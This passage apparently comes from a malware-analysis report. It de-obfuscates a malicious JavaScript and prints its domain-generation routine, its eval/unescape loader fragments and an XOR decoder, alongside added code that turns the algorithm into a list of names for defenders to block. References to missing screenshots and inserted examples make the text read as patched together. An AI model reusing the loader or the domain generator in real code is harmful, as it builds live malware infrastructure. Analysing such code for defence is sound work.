shows the section of the de-obfuscated JavaScript code that creates the domain names. The
t9 array holds the encoded date, which is then processed into the variables yCh2 (from the
year), mCh (from the month), yCh1 (from the year again), dCh (from the week day) and
m9 (the three-letter form of the month) to build the name, with “.com” appended at the end.
Using this algorithm it is possible to calculate the names in advance. One sees, for
instance, that all DNS names in the month of June end in *xes.com (see the script sections
in boldface).


// Three-letter month tokens: the generated name ends in m9[month-1] + '.com'
var m9=new Array('uno','dve','thr','fir','vif','xes','ves','ght','eni','etn','lev','twe');
var l9=new Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
var n9=new Array(1,2,3,4,5,6,7,8,9);
var t9=new Array();
var d9=new Date();
t9['y']=d9.getFullYear();
// Day value derived from the day of month and the weekday: Sunday to Wednesday
// share one value and Thursday to Saturday another, so the name changes twice a week
if(d9.getDay()>3)
    t9['d']=d9.getDate()-(d9.getDay()+2);
else
    t9['d']=d9.getDate()-(d9.getDay());
if(t9['d']<0)
    t9['d']=1;
t9['m']=d9.getMonth()+1;


// Mixing function that combines day, month and year into a single number
function CMN(d,m,y)
{
    var r=(((y+(3*d))+(m^d)*3)+d);return r; }


// Placeholder domain in the payload string $ that is replaced by the generated name
var d='veslox.com';
var yCh1,yCh2,mCh,dCh,mNm;
if(t9['y']<2007)
    {t9['y'] = 2007;}
mNm=CMN(t9['d'],t9['m'],t9['y']);
// Letters derived from the year (yCh1, yCh2) and the month (mCh)
yCh1=l9[(((t9['y']&0xAA)+mNm)% 63)% 26]; yCh2=l9[((((t9['y']&0x3311)>>3)+mNm)% 10)]; mCh=l9[((t9['m']+mNm)% 25)];
// Day character: a digit for small day values, a letter otherwise
if(((t9['d']*2)>=0)&&((t9['d']*2)<=9))
    dCh=n9[(t9['d']% 10)];
else
    dCh=l9[((t9['d']*6)% 27)];
// Assemble the name and substitute it for the placeholder in the payload string $
$=$.replace(d,yCh2+mCh+yCh1+dCh+m9[t9['m']-1]+'.com');




Illustration 4: Section of de-obfuscated JavaScript code that creates the domain name
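The name-generation routine of Illustration 4, rewritten as a function of the date so that, as the text notes, the names can be computed ahead of time for DNS monitoring or blocking. This is an added example and not code from the report or from the script itself: the constants and arithmetic are taken from Illustration 4 unchanged, while the function names dgaDayValue, dgaDomain and domainsForMonth are this example's own. Evaluated for 9 June 2008 it yields annvxes.com, the name mentioned with Illustration 3, and every name it produces for June 2008 ends in xes.com.

```javascript
// Added example, not code from the MELANI report: the Illustration 4 routine
// with the date passed in as a parameter instead of read from the clock.
// Constants and arithmetic are the script's own; function names are ours.

const M9 = ['uno','dve','thr','fir','vif','xes','ves','ght','eni','etn','lev','twe'];
const L9 = 'abcdefghijklmnopqrstuvwxyz'.split('');
const N9 = [1, 2, 3, 4, 5, 6, 7, 8, 9];

// The script's CMN mixing function, unchanged.
function CMN(d, m, y) {
  return ((y + 3 * d) + (m ^ d) * 3) + d;
}

// The "day" value depends on day of month and weekday: Sunday to Wednesday
// share one value, Thursday to Saturday another, hence two names per week.
function dgaDayValue(date) {
  const dow = date.getDay();
  let d = dow > 3 ? date.getDate() - (dow + 2) : date.getDate() - dow;
  if (d < 0) d = 1;
  return d;
}

// Domain the script would produce on the given (local) date.
function dgaDomain(date) {
  let y = date.getFullYear();
  if (y < 2007) y = 2007;
  const m = date.getMonth() + 1;
  const d = dgaDayValue(date);
  const mNm = CMN(d, m, y);
  const yCh1 = L9[(((y & 0xAA) + mNm) % 63) % 26];
  const yCh2 = L9[(((y & 0x3311) >> 3) + mNm) % 10];
  const mCh = L9[(m + mNm) % 25];
  const dCh = (d * 2 >= 0 && d * 2 <= 9) ? N9[d % 10] : L9[(d * 6) % 27];
  return yCh2 + mCh + yCh1 + dCh + M9[m - 1] + '.com';
}

// Every distinct name used during a month (month is 1-12): the list a
// defender would feed to DNS monitoring or a blocklist ahead of time.
function domainsForMonth(year, month) {
  const seen = new Set();
  const out = [];
  for (let day = 1; day <= 31; day++) {
    const dt = new Date(year, month - 1, day);
    if (dt.getMonth() !== month - 1) break; // rolled past the end of the month
    const name = dgaDomain(dt);
    if (!seen.has(name)) { seen.add(name); out.push(name); }
  }
  return out;
}

console.log(dgaDomain(new Date(2008, 5, 9)));  // annvxes.com, the name of Illustration 3
console.log(domainsForMonth(2008, 6));
```

Because the original reads the infected machine's local clock, names should be generated for the time zone of the monitored population; a bot a few hours ahead of the monitoring system switches to the Thursday name before the defender's list does.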




This is an example of advanced malware requiring great obfuscation effort to make analysis
more difficult. The simplest method consists in starting the malware on a dedicated system
and observing it. To understand the malware in depth, however, and to reconstruct the
algorithm, reverse code engineering is required.




Example: Analysis with the help of Malzilla 36




The script is sent to the decoder and, after several manual corrections (href.location and
callee string) executed in the emulator; the eval results can then be double-clicked:




36 This analysis was carried out by Adrian Leuenberger from Compass Security.






The deciphered code at the first level appears in the bottom window and is copied using
Copy & Paste into a new source window (for illustrative purposes here somewhat unformatted,
which is however not necessary):





The cookie-relevant queries are removed manually, since they would not work in the
emulation:




The script is executed again, and the following code is generated:




Double clicks on the 4 elements ultimately reveal several code fragments:

A)
function dw(t){ca='%64%6f%63ume%6et.%77rit%65(%22';ce='%22)';cb='%3cscr%69%70t%6ca%6eg%75a%67e%3d%5c%22java%73cri%70t%5c%22%3e';cc='%3c%5c%2fscript%3e';eval(unescape(t))};
function cz(cz){return ca+cb+cc+cd+ce+cz;};
$="dw(dcs(cu,14));";st="$=st;dcs(da+db+dc+dd+de,10);dw(st);st=$;";dw(dz+cz($+st));



B) (almost identical to A, but decoded further)
function dw(t){ca='%64%6f%63ume%6et.%77rit%65(%22';ce='%22)';cb='%3cscr%69%70t%6ca%6eg%75a%67e%3d%5c%22java%73cri%70t%5c%22%3e';cc='%3c%5c%2fscript%3e';eval(unescape(t))};
function dcs(ds,es){ds=unescape(ds);st=tmp='';for(i=0;i<ds.length;i++){tmp=ds.slice(i,i+1);st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));}}
dw(dcs(cu,14));$=st;dcs(da+db+dc+dd+de,10);dw(st);st=$
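The dcs() routine in fragment B is the XOR layer of the obfuscation. Below it is re-implemented readably, as an added example that is not code from the report or from Malzilla, together with an inverse used only to build a constructed test string. One detail worth seeing in running code: the key is built as the string '0x00' + es, which JavaScript coerces as a hexadecimal number, so dcs(cu,14) XORs with 0x14 (decimal 20) and dcs(...,10) with 0x10 (decimal 16). The function names and the sample text are this example's own.

```javascript
// Added example, not code from the MELANI report or from Malzilla: a readable
// port of the dcs() decoder seen in fragment B, plus an encoder for test data.

// Key exactly as the original derives it: '0x00' + es coerced to a number,
// so the decimal-looking argument is really read as hexadecimal.
function dcsKey(es) {
  return Number('0x00' + es);
}

// Decode: percent-unescape the string, then XOR every character code with the key.
function dcsDecode(escaped, es) {
  const key = dcsKey(es);
  const raw = unescape(escaped);
  let out = '';
  for (let i = 0; i < raw.length; i++) {
    out += String.fromCharCode(raw.charCodeAt(i) ^ key);
  }
  return out;
}

// Inverse, used here only to construct test material: XOR, then %XX-escape each byte.
function dcsEncode(plain, es) {
  const key = dcsKey(es);
  let out = '';
  for (let i = 0; i < plain.length; i++) {
    const c = plain.charCodeAt(i) ^ key;
    out += '%' + c.toString(16).toUpperCase().padStart(2, '0');
  }
  return out;
}

// Constructed sample: the inner script only writes a harmless string.
const SAMPLE_PLAIN = 'document.write("decoded layer");';
const SAMPLE_ENCODED = dcsEncode(SAMPLE_PLAIN, 14);

console.log(SAMPLE_ENCODED);
console.log(dcsDecode(SAMPLE_ENCODED, 14));
```

When peeling such a layer by hand it is easy to try the wrong key: decoding with 10 instead of 14 yields readable-looking but wrong text, which is why checking the result for the expected next-stage tokens (document.write, <script, a hostname) is worthwhile before going on to the next layer.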


C)
undefined



D)
var m9=new Array('uno','dve','thr','fir','vif','xes','ves','ght','eni','etn','lev','twe');var l9=new Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');var n9=new Array(1,2,3,4,5,6,7,8,9);var t9=new Array();var d9=new Date();
t9['y']=d9.getFullYear();if(d9.getDay()>3)t9['d']=d9.getDate()-(d9.getDay()+2);else t9['d']=d9.getDate()-(d9.getDay());if(t9['d']<0)t9['d']=1;t9['m']=d9.getMonth()+1;
function CMN(d,m,y){var r=(((y+(3*d))+(m^d)*3)+d);return r;}
var d='veslox.com';var yCh1,yCh2,mCh,dCh,mNm;if(t9['y']<2007){t9['y'] = 2007;}mNm=CMN(t9['d'],t9['m'],t9['y']);
yCh1=l9[(((t9['y']&0xAA)+mNm)% 63)% 26];yCh2=l9[((((t9['y']&0x3311)>>3)+mNm)% 10)];mCh=l9[((t9['m']+mNm)% 25)];
if(((t9['d']*2)>=0)&&((t9['d']*2)<=9))dCh=n9[(t9['d']% 10)];else dCh=l9[((t9['d']*6)% 27)];$=$.replace(d,yCh2+mCh+yCh1+dCh+m9[t9['m']-1]+'.com')


The last part is the most interesting. After reformatting, the ultimately used, de-obfuscated
JavaScript code to generate the dynamic DNS name appears (some comments were
inserted manually):



